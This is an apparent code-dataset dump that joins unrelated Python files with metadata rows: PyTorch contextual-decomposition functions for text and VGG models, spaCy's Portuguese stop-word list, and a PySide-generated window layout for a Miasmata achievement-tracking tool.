model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0] #get the output and focus on relevant scores for class 0 vs 1
model_softmax = torch.nn.functional.softmax(model_output, dim =0)[batch.label[idx_nonzero],np.arange(len(idx_nonzero))] #take softmax of class 0 vs 1 and take the correct digit
output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() #-(torch.log(1-model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #if it agrees, maximize - if it dis, min
return output
# def cd_penalty_annotated(batch, model1, start, stop, scores):
# # get index where annotation present:
# idx_nonzero = (start != -1).nonzero()[:,0]
# model_output = cd_text_irreg_scores(batch.text[:, idx_nonzero], model1, start[ idx_nonzero], stop[idx_nonzero])[0]
# correct_idx = (batch.label[ idx_nonzero], torch.arange(batch.label[ idx_nonzero].shape[0]) )
# model_softmax = torch.nn.functional.softmax(model_output, dim =0)[correct_idx]
# output = -(torch.log(model_softmax)*scores[ idx_nonzero].float()).mean() -(torch.log(model_softmax)*(1- scores[ idx_nonzero]).float() ).mean() #next thing to try
# print(output, torch.log(model_softmax).mean())
# return output
# def cd_penalty_annotated(batch, model1, start, stop, agrees):
# model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
# correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
# model1_softmax = softmax_out((model1_output[0][0],model1_output[0][1]))[correct_idx]
# output = -(torch.log(model1_softmax) * agrees.float()).mean() #+ (torch.log(model1_softmax) * (1-agrees).float()).mean()
# return output
def cd_penalty_for_one_decoy_all(batch, model1, start, stop):
mask_exists =(start!=-1).byte().cuda()
if mask_exists.any():
model1_output = cd_text_irreg_scores(batch.text, model1, start, stop)
correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
wrong_idx = (1-batch.label, torch.arange(batch.label.shape[0]))
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx])) #+ softmax_out((model1_output[0][wrong_idx],model1_output[1][wrong_idx]))
output = (torch.log(model1_softmax[:,1])).masked_select(mask_exists)
return -output.mean()
else:
return torch.zeros(1).cuda()
def cd_penalty(batch, model1, model2, start, stop):
model1_output = cd_batch_text(batch, model1, start, stop)
model2_output = cd_batch_text(batch, model2, start, stop)
model1_softmax = softmax_out(model1_output)
model2_softmax = softmax_out(model2_output)
return ((model1_softmax-model2_softmax)*(torch.log(model1_softmax) - torch.log(model2_softmax))).sum(dim=1).reshape((2,-1)).sum(dim=0)
# this implementation of cd is very long so that we can view CD at intermediate layers
# in reality, this should be a loop which uses the above functions
def cd_vgg_features(blob,im_torch, model, model_type='vgg'):
# set up model
model.eval()
# set up blobs
blob = torch.cuda.FloatTensor(blob)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
mods = list(model.modules())[2:]
# (0): Conv2d (3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (1): ReLU(inplace)
# (2): Conv2d (64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (3): ReLU(inplace)
# (4): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[4], model_type=model_type)
# (5): Conv2d (64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (6): ReLU(inplace)
# (7): Conv2d (128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (8): ReLU(inplace)
# (9): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[6])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[7])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[8])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[9], model_type=model_type)
# (10): Conv2d (128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (11): ReLU(inplace)
# (12): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (13): ReLU(inplace)
# (14): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (15): ReLU(inplace)
# (16): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[10])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[11])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[12])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[13])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[14])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[15])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[16], model_type=model_type)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[17])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[18])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[19])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[20])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[21])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[22])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[23], model_type=model_type)
# scores.append((relevant.clone(), irrelevant.clone()))
# (24): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (25): ReLU(inplace)
# (26): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (27): ReLU(inplace)
# (28): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (29): ReLU(inplace)
# (30): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[24])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[25])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[26])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[27])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[28])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[29])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[30], model_type=model_type)
relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mods[31])
# scores.append((relevant.clone(), irrelevant.clone()))
# return relevant, irrelevant
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
return relevant, irrelevant
def cd_vgg_classifier(relevant, irrelevant, im_torch, model, model_type='vgg'):
# set up model
model.eval()
mods = list(model.modules())[1:]
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
# print(relevant.shape)
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[4])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[6])
# only interested in not cancer, which is class 0
#model.train()
return relevant, irrelevant
def cd_track_vgg(blob, im_torch, model, model_type='vgg'):
# set up model
model.eval()
# set up blobs
blob = torch.cuda.FloatTensor(blob)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
mods = list(model.modules())[2:]
# (0): Conv2d (3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (1): ReLU(inplace)
# (2): Conv2d (64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (3): ReLU(inplace)
# (4): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[3])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[4], model_type=model_type)
# (5): Conv2d (64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (6): ReLU(inplace)
# (7): Conv2d (128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (8): ReLU(inplace)
# (9): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[5])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[6])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[7])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[8])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[9], model_type=model_type)
# (10): Conv2d (128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (11): ReLU(inplace)
# (12): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (13): ReLU(inplace)
# (14): Conv2d (256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (15): ReLU(inplace)
# (16): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[10])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[11])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[12])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[13])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[14])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[15])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[16], model_type=model_type)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[17])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[18])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[19])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[20])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[21])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[22])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[23], model_type=model_type)
# scores.append((relevant.clone(), irrelevant.clone()))
# (24): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (25): ReLU(inplace)
# (26): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (27): ReLU(inplace)
# (28): Conv2d (512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
# (29): ReLU(inplace)
# (30): MaxPool2d(kernel_size=(2, 2), stride=(2, 2), dilation=(1, 1))
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[24])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[25])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[26])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[27])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[28])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[29])
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mods[30], model_type=model_type)
relevant, irrelevant = propagate_AdaptiveAvgPool2d(relevant, irrelevant, mods[31])
# scores.append((relevant.clone(), irrelevant.clone()))
# return relevant, irrelevant
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
# (classifier): Sequential(
# (0): Linear(in_features=25088, out_features=4096)
# (1): ReLU(inplace)
# (2): Dropout(p=0.5)
# (3): Linear(in_features=4096, out_features=4096)
# (4): ReLU(inplace)
# (5): Dropout(p=0.5)
# (6): Linear(in_features=4096, out_features=1000)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[33])
# print(relevant.shape)
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[34])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[35])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[36])
relevant, irrelevant = propagate_relu(relevant, irrelevant, mods[37])
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mods[38])
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[39])
return relevant, irrelevant
| 49.599132
| 190
| 0.664663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,942
| 0.20255
|
774b06809a445d82f24ad6693ec8a85d76b2e232
| 2,554
|
py
|
Python
|
spacy/lang/pt/stop_words.py
|
cedar101/spaCy
|
66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95
|
[
"MIT"
] | 12
|
2019-03-20T20:43:47.000Z
|
2020-04-13T11:10:52.000Z
|
spacy/lang/pt/stop_words.py
|
cedar101/spaCy
|
66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95
|
[
"MIT"
] | 13
|
2018-06-05T11:54:40.000Z
|
2019-07-02T11:33:14.000Z
|
spacy/lang/pt/stop_words.py
|
cedar101/spaCy
|
66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95
|
[
"MIT"
] | 2
|
2020-02-15T18:33:35.000Z
|
2022-02-13T14:11:41.000Z
|
# coding: utf8
from __future__ import unicode_literals
STOP_WORDS = set(
"""
à às área acerca ademais adeus agora ainda algo algumas alguns ali além ambas ambos antes
ao aos apenas apoia apoio apontar após aquela aquelas aquele aqueles aqui aquilo
as assim através atrás até aí
baixo bastante bem boa bom breve
cada caminho catorze cedo cento certamente certeza cima cinco coisa com como
comprida comprido conhecida conhecido conselho contra contudo corrente cuja
cujo custa cá
da daquela daquele dar das de debaixo demais dentro depois des desde dessa desse
desta deste deve devem deverá dez dezanove dezasseis dezassete dezoito diante
direita disso diz dizem dizer do dois dos doze duas dá dão
é és ela elas ele eles em embora enquanto entre então era essa essas esse esses esta
estado estar estará estas estava este estes esteve estive estivemos estiveram
estiveste estivestes estou está estás estão eu eventual exemplo
falta fará favor faz fazeis fazem fazemos fazer fazes fazia faço fez fim final
foi fomos for fora foram forma foste fostes fui
geral grande grandes grupo
inclusive iniciar inicio ir irá isso isto
já
lado lhe ligado local logo longe lugar lá
maior maioria maiorias mais mal mas me meio menor menos meses mesmo meu meus mil
minha minhas momento muito muitos máximo mês
na nada naquela naquele nas nem nenhuma nessa nesse nesta neste no nos nossa
nossas nosso nossos nova novas nove novo novos num numa nunca nuns não nível nós
número números
obrigada obrigado oitava oitavo oito onde ontem onze ora os ou outra outras outros
para parece parte partir pegar pela pelas pelo pelos perto pode podem poder poderá
podia pois ponto pontos por porquanto porque porquê portanto porém posição
possivelmente posso possível pouca pouco povo primeira primeiro próprio próxima
próximo puderam pôde põe põem
quais qual qualquer quando quanto quarta quarto quatro que quem quer querem quero
questão quieta quieto quinta quinto quinze quê
relação
sabe saber se segunda segundo sei seis sem sempre ser seria sete seu seus sexta
sexto sim sistema sob sobre sois somente somos sou sua suas são sétima sétimo só
tais tal talvez também tanta tanto tarde te tem temos tempo tendes tenho tens
tentar tentaram tente tentei ter terceira terceiro teu teus teve tipo tive
tivemos tiveram tiveste tivestes toda todas todo todos treze três tu tua tuas
tudo tão têm
um uma umas uns usa usar último
vai vais valor veja vem vens ver vez vezes vinda vindo vinte você vocês vos vossa
vossas vosso vossos vários vão vêm vós
zero
""".split()
)
| 35.971831
| 89
| 0.817541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,541
| 0.970959
|
774b9166abe0ad0a7b9b9dd1b88e0f21b94c408a
| 13,906
|
py
|
Python
|
miaschiev_ui.py
|
DarkStarSword/miasmata-fixes
|
d320f5e68cd5ebabd14efd7af021afa7e63d161e
|
[
"MIT"
] | 10
|
2015-06-13T17:27:18.000Z
|
2021-02-14T13:03:11.000Z
|
miaschiev_ui.py
|
DarkStarSword/miasmata-fixes
|
d320f5e68cd5ebabd14efd7af021afa7e63d161e
|
[
"MIT"
] | 2
|
2020-07-11T18:34:57.000Z
|
2021-03-07T02:27:46.000Z
|
miaschiev_ui.py
|
DarkStarSword/miasmata-fixes
|
d320f5e68cd5ebabd14efd7af021afa7e63d161e
|
[
"MIT"
] | 1
|
2016-03-23T22:26:23.000Z
|
2016-03-23T22:26:23.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'miaschiev.ui'
#
# Created: Wed Aug 06 17:13:17 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Miaschiev(object):
def setupUi(self, Miaschiev):
Miaschiev.setObjectName("Miaschiev")
Miaschiev.resize(1333, 860)
self.centralwidget = QtGui.QWidget(Miaschiev)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.install_path = QtGui.QLineEdit(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.install_path.sizePolicy().hasHeightForWidth())
self.install_path.setSizePolicy(sizePolicy)
self.install_path.setObjectName("install_path")
self.gridLayout.addWidget(self.install_path, 2, 0, 1, 1)
self.save_browse = QtGui.QPushButton(self.centralwidget)
self.save_browse.setObjectName("save_browse")
self.gridLayout.addWidget(self.save_browse, 4, 1, 1, 1)
self.install_browse = QtGui.QPushButton(self.centralwidget)
self.install_browse.setObjectName("install_browse")
self.gridLayout.addWidget(self.install_browse, 2, 1, 1, 1)
self.save_path = QtGui.QLineEdit(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.save_path.sizePolicy().hasHeightForWidth())
self.save_path.setSizePolicy(sizePolicy)
self.save_path.setObjectName("save_path")
self.gridLayout.addWidget(self.save_path, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
self.label_2.setSizePolicy(sizePolicy)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 3, 0, 1, 2)
self.label = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 1, 0, 1, 2)
self.verticalLayout.addLayout(self.gridLayout)
spacerItem = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem)
self.save0 = QtGui.QPushButton(self.centralwidget)
self.save0.setEnabled(False)
self.save0.setMinimumSize(QtCore.QSize(0, 38))
self.save0.setMaximumSize(QtCore.QSize(416, 16777215))
self.save0.setObjectName("save0")
self.verticalLayout.addWidget(self.save0)
self.save1 = QtGui.QPushButton(self.centralwidget)
self.save1.setEnabled(False)
self.save1.setMinimumSize(QtCore.QSize(0, 38))
self.save1.setMaximumSize(QtCore.QSize(416, 16777215))
self.save1.setObjectName("save1")
self.verticalLayout.addWidget(self.save1)
self.save2 = QtGui.QPushButton(self.centralwidget)
self.save2.setEnabled(False)
self.save2.setMinimumSize(QtCore.QSize(0, 38))
self.save2.setMaximumSize(QtCore.QSize(416, 16777215))
self.save2.setObjectName("save2")
self.verticalLayout.addWidget(self.save2)
spacerItem1 = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem1)
self.formLayout = QtGui.QFormLayout()
self.formLayout.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout.setObjectName("formLayout")
self.lbl_coast = QtGui.QLabel(self.centralwidget)
self.lbl_coast.setEnabled(False)
self.lbl_coast.setObjectName("lbl_coast")
self.formLayout.setWidget(1, QtGui.QFormLayout.LabelRole, self.lbl_coast)
self.show_coast = QtGui.QPushButton(self.centralwidget)
self.show_coast.setEnabled(False)
self.show_coast.setObjectName("show_coast")
self.formLayout.setWidget(2, QtGui.QFormLayout.SpanningRole, self.show_coast)
spacerItem2 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(3, QtGui.QFormLayout.SpanningRole, spacerItem2)
self.lbl_urns = QtGui.QLabel(self.centralwidget)
self.lbl_urns.setEnabled(False)
self.lbl_urns.setObjectName("lbl_urns")
self.formLayout.setWidget(4, QtGui.QFormLayout.LabelRole, self.lbl_urns)
self.urns = QtGui.QLabel(self.centralwidget)
self.urns.setText("")
self.urns.setObjectName("urns")
self.formLayout.setWidget(4, QtGui.QFormLayout.FieldRole, self.urns)
self.show_urns = QtGui.QPushButton(self.centralwidget)
self.show_urns.setEnabled(False)
self.show_urns.setObjectName("show_urns")
self.formLayout.setWidget(5, QtGui.QFormLayout.SpanningRole, self.show_urns)
spacerItem3 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(6, QtGui.QFormLayout.SpanningRole, spacerItem3)
self.lbl_heads = QtGui.QLabel(self.centralwidget)
self.lbl_heads.setEnabled(False)
self.lbl_heads.setObjectName("lbl_heads")
self.formLayout.setWidget(7, QtGui.QFormLayout.LabelRole, self.lbl_heads)
self.heads = QtGui.QLabel(self.centralwidget)
self.heads.setObjectName("heads")
self.formLayout.setWidget(7, QtGui.QFormLayout.FieldRole, self.heads)
self.show_heads = QtGui.QPushButton(self.centralwidget)
self.show_heads.setEnabled(False)
self.show_heads.setObjectName("show_heads")
self.formLayout.setWidget(8, QtGui.QFormLayout.LabelRole, self.show_heads)
self.reset_head = QtGui.QPushButton(self.centralwidget)
self.reset_head.setEnabled(False)
self.reset_head.setObjectName("reset_head")
self.formLayout.setWidget(8, QtGui.QFormLayout.FieldRole, self.reset_head)
spacerItem4 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(9, QtGui.QFormLayout.SpanningRole, spacerItem4)
self.lbl_notes = QtGui.QLabel(self.centralwidget)
self.lbl_notes.setEnabled(False)
self.lbl_notes.setObjectName("lbl_notes")
self.formLayout.setWidget(10, QtGui.QFormLayout.LabelRole, self.lbl_notes)
self.notes = QtGui.QLabel(self.centralwidget)
self.notes.setText("")
self.notes.setObjectName("notes")
self.formLayout.setWidget(10, QtGui.QFormLayout.FieldRole, self.notes)
self.reset_notezz = QtGui.QPushButton(self.centralwidget)
self.reset_notezz.setEnabled(False)
self.reset_notezz.setObjectName("reset_notezz")
self.formLayout.setWidget(11, QtGui.QFormLayout.SpanningRole, self.reset_notezz)
spacerItem5 = QtGui.QSpacerItem(20, 16, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.formLayout.setItem(12, QtGui.QFormLayout.SpanningRole, spacerItem5)
self.lbl_plants = QtGui.QLabel(self.centralwidget)
self.lbl_plants.setEnabled(False)
self.lbl_plants.setObjectName("lbl_plants")
self.formLayout.setWidget(13, QtGui.QFormLayout.LabelRole, self.lbl_plants)
self.plants = QtGui.QLabel(self.centralwidget)
self.plants.setText("")
self.plants.setObjectName("plants")
self.formLayout.setWidget(13, QtGui.QFormLayout.FieldRole, self.plants)
self.coast = QtGui.QLabel(self.centralwidget)
self.coast.setText("")
self.coast.setObjectName("coast")
self.formLayout.setWidget(1, QtGui.QFormLayout.FieldRole, self.coast)
self.verticalLayout.addLayout(self.formLayout)
spacerItem6 = QtGui.QSpacerItem(20, 32, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
self.verticalLayout.addItem(spacerItem6)
self.save_map = QtGui.QPushButton(self.centralwidget)
self.save_map.setEnabled(False)
self.save_map.setObjectName("save_map")
self.verticalLayout.addWidget(self.save_map)
spacerItem7 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem7)
self.horizontalLayout_2.addLayout(self.verticalLayout)
self.scrollArea = QtGui.QScrollArea(self.centralwidget)
self.scrollArea.setMinimumSize(QtCore.QSize(768, 0))
self.scrollArea.setBaseSize(QtCore.QSize(1024, 1024))
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 1024, 1024))
self.scrollAreaWidgetContents.setMinimumSize(QtCore.QSize(1024, 1024))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.horizontalLayout_2.addWidget(self.scrollArea)
Miaschiev.setCentralWidget(self.centralwidget)
self.statusBar = QtGui.QStatusBar(Miaschiev)
self.statusBar.setObjectName("statusBar")
Miaschiev.setStatusBar(self.statusBar)
self.retranslateUi(Miaschiev)
QtCore.QMetaObject.connectSlotsByName(Miaschiev)
Miaschiev.setTabOrder(self.install_path, self.install_browse)
Miaschiev.setTabOrder(self.install_browse, self.save_path)
Miaschiev.setTabOrder(self.save_path, self.save_browse)
Miaschiev.setTabOrder(self.save_browse, self.save0)
Miaschiev.setTabOrder(self.save0, self.save1)
Miaschiev.setTabOrder(self.save1, self.save2)
Miaschiev.setTabOrder(self.save2, self.show_coast)
Miaschiev.setTabOrder(self.show_coast, self.show_urns)
Miaschiev.setTabOrder(self.show_urns, self.show_heads)
Miaschiev.setTabOrder(self.show_heads, self.reset_head)
Miaschiev.setTabOrder(self.reset_head, self.reset_notezz)
Miaschiev.setTabOrder(self.reset_notezz, self.scrollArea)
def retranslateUi(self, Miaschiev):
Miaschiev.setWindowTitle(QtGui.QApplication.translate("Miaschiev", "Mias(Achievement)mata", None, QtGui.QApplication.UnicodeUTF8))
self.save_browse.setText(QtGui.QApplication.translate("Miaschiev", "Browse...", None, QtGui.QApplication.UnicodeUTF8))
self.install_browse.setText(QtGui.QApplication.translate("Miaschiev", "Browse...", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("Miaschiev", "Miasmata Saved Games Location:", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Miaschiev", "Miasmata Install Location:", None, QtGui.QApplication.UnicodeUTF8))
self.save0.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 1", None, QtGui.QApplication.UnicodeUTF8))
self.save1.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 2", None, QtGui.QApplication.UnicodeUTF8))
self.save2.setText(QtGui.QApplication.translate("Miaschiev", "Load Save Slot 3", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_coast.setText(QtGui.QApplication.translate("Miaschiev", "Coastline Mapped:", None, QtGui.QApplication.UnicodeUTF8))
self.show_coast.setText(QtGui.QApplication.translate("Miaschiev", "Show Mapped Coastline", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_urns.setText(QtGui.QApplication.translate("Miaschiev", "Urns Lit:", None, QtGui.QApplication.UnicodeUTF8))
self.show_urns.setText(QtGui.QApplication.translate("Miaschiev", "Show Lit Urns", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_heads.setText(QtGui.QApplication.translate("Miaschiev", "Head Statues Located:", None, QtGui.QApplication.UnicodeUTF8))
self.show_heads.setText(QtGui.QApplication.translate("Miaschiev", "Show", None, QtGui.QApplication.UnicodeUTF8))
self.reset_head.setText(QtGui.QApplication.translate("Miaschiev", "Reset one statue...", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_notes.setText(QtGui.QApplication.translate("Miaschiev", "Notes Found:", None, QtGui.QApplication.UnicodeUTF8))
self.reset_notezz.setText(QtGui.QApplication.translate("Miaschiev", "Reset missing Sanchez #1 note...", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_plants.setText(QtGui.QApplication.translate("Miaschiev", "Plants Found:", None, QtGui.QApplication.UnicodeUTF8))
self.save_map.setText(QtGui.QApplication.translate("Miaschiev", "Save current map to file...", None, QtGui.QApplication.UnicodeUTF8))
| 64.082949
| 151
| 0.718898
| 13,615
| 0.979074
| 0
| 0
| 0
| 0
| 0
| 0
| 1,213
| 0.087229
|
774bad54e921796a93026ea0248ace9747a3f917
| 1,673
|
py
|
Python
|
layers/db/db/tests/test_db.py
|
NASA-IMPACT/hls-sentinel2-downloader-serverless
|
e3e4f542fc805c6259f20a6dd932c98cccd4144c
|
[
"Apache-2.0"
] | null | null | null |
layers/db/db/tests/test_db.py
|
